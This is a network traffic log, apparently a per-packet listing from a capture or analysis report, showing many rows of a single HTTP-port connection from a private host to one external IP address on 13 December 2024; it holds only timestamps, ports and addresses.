Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127590895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127609968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127629995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127646923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127665043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127681971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127698898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127717018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127732992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127732992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127732992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127732992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127732992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127759933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127783060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127795935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127819061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127832890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127859116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127872944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127896070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127911091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127921104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.127938986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128062010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128062010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128088951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128104925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128135920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128235102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128262997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128282070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128371000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128393888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128427029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128459930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128474951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128520966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128520966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128537893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128559113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128585100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128597975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128623962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128652096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128680944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128846884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128880978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128905058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128918886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128943920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128957987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128976107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.128989935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129014015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129028082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129053116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129066944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129089117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129102945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129123926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129137993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129172087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129188061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129211903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129225016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129247904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129262924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129281998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129298925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129411936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129437923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129451990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129472971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129487038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129511118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129524946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129544020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129563093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129576921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129599094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129611969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129659891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129659891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129681110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.129689932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130023003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130038023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130074978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130137920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130167961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130191088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130203962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130227089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130239964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130260944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130280972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130295992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130436897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130475044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130515099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130583048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130597115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130624056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130636930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130662918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130677938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130705118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130718946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130743980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130757093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130788088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130801916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130832911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130846977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130872965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.130889893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131042957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131079912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131094933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131125927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131205082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131226063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131256104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131283045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131346941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131373882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131388903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131417036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131452084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131467104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131493092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131515980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131531000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131557941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131571054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131599903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131613970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131639957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131653070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131680965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131696939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131726027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131881952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131915092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131930113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131951094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131964922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.131985903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132002115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132025957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132040977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132061005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132077932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132101059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132121086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132138968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132157087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132177114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132190943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132204056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132222891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132251978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132271051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132297993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132311106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132435083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132466078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132482052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132507086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132524967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132550955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132565022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132584095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132611990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132632017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132648945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132671118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132693052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132710934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132774115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132800102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132814884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132836103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132849932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132882118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132896900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132919073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132960081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132960081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132977962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.132998943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133018017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133044004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133058071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133078098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133099079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133120060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133133888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133230925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133248091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133287907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133315086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133330107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133352041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133367062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133394957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133409023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133447886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133472919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133500099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133513927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133539915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133553982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133578062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133594036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133615971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133651972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133676052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133691072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133785009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133811951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133846045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133861065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133886099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133899927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133920908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.133996964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134016037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134038925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134057045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134129047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134129047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134145975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134167910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134182930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134202957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134229898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134255886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134270906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134298086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134315014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134335995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134350061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134370089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134382963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134406090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134424925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134438992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134463072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134478092 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134500980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134515047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134537935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134551048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134577990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134591103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134613037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134627104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134649992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134664059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134691000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134717941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134731054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134748936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134762049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134785891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134802103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134826899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134841919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134862900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134876013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134901047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134915113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134938002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134952068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134974003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.134989023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135015011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135029078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135047913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135061979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135086060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135101080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135121107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135134935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135154963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135168076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135193110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.135206938 CET	49775	80	192.168.2.5	185.81.68.147
